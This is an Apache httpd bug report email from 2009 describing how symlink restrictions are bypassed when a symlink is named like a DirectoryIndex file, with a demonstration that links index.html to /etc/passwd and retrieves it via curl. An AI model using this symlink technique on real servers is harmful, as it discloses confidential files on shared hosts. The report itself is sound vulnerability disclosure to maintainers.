DO NOT REPLY [Bug 47337] New: FollowSymlinks and SymLinksIfOwnerMatch are ignored if a symlink's name conforms to DirectoryIndex

Tue, 09 Jun 2009 09:07:37 -0700 

https://issues.apache.org/bugzilla/show_bug.cgi?id=47337

           Summary: FollowSymlinks and SymLinksIfOwnerMatch are ignored if
                    a symlink's name conforms to DirectoryIndex
           Product: Apache httpd-2
           Version: 2.2.11
          Platform: All
        OS/Version: Linux
            Status: NEW
          Severity: major
          Priority: P2
         Component: Core
        AssignedTo: [email protected]
        ReportedBy: [email protected]


Apache ignores SymLinksIfOwnerMatch- and FollowSymlinks-directives if the name
of the symlink in question matches a valid value for DirectoryIndex.


Expected behaviour: 403 Forbidden, the symlink's target should not be
delivered.

Observed behaviour: 200 OK, the symlink's target is delivered to the client.


Impact: this could prove a security problem, especially in shared hosting
environments. It is possible to disclose confidential information by
arbitrarily creating symlinks to files readable by the apache process.


Demonstration:
--- snip ---
x...@v1384:~/dev/test$ ls -la . /etc/passwd
-rw-r--r-- 1 root root 1570 2009-03-23 11:06 /etc/passwd

.:
total 3
drwxr-xr-x 2 xy xy 1024 2009-06-09 16:50 .
drwxr-xr-x 5 xy xy 1024 2009-06-09 16:31 ..
-rw-r--r-- 1 xy xy   29 2009-06-09 16:48 .htaccess
lrwxrwxrwx 1 xy xy   11 2009-06-09 16:47 index.html -> /etc/passwd
lrwxrwxrwx 1 xy xy   11 2009-06-09 16:50 symlink -> /etc/passwd

x...@v1384:~/dev/test$ cat .htaccess
Options SymLinksIfOwnerMatch

x...@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/symlink
HTTP/1.1 403 Forbidden
Date: Tue, 09 Jun 2009 15:36:52 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1

x...@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/index.html
HTTP/1.1 403 Forbidden
Date: Tue, 09 Jun 2009 15:37:00 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1

x...@v1384:~/dev/test$ curl --head http://dev.truschnigg.info/test/
HTTP/1.1 200 OK
Date: Tue, 09 Jun 2009 15:37:03 GMT
Server: Apache
Last-Modified: Mon, 23 Mar 2009 10:06:27 GMT
ETag: "f979d3e-622-465c66b6bcec0"
Accept-Ranges: bytes
Content-Length: 1570
Content-Type: text/html
--- snip ---


The above behaviour is the same if FollowSymlinks, instead of
SymLinksIfOwnerMatch, is used to restrict access.
This is reproducible on Apache 2.2.9 (Debian Stable) and 2.2.11 (Gentoo ~x86).

-- 
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

Reply via email to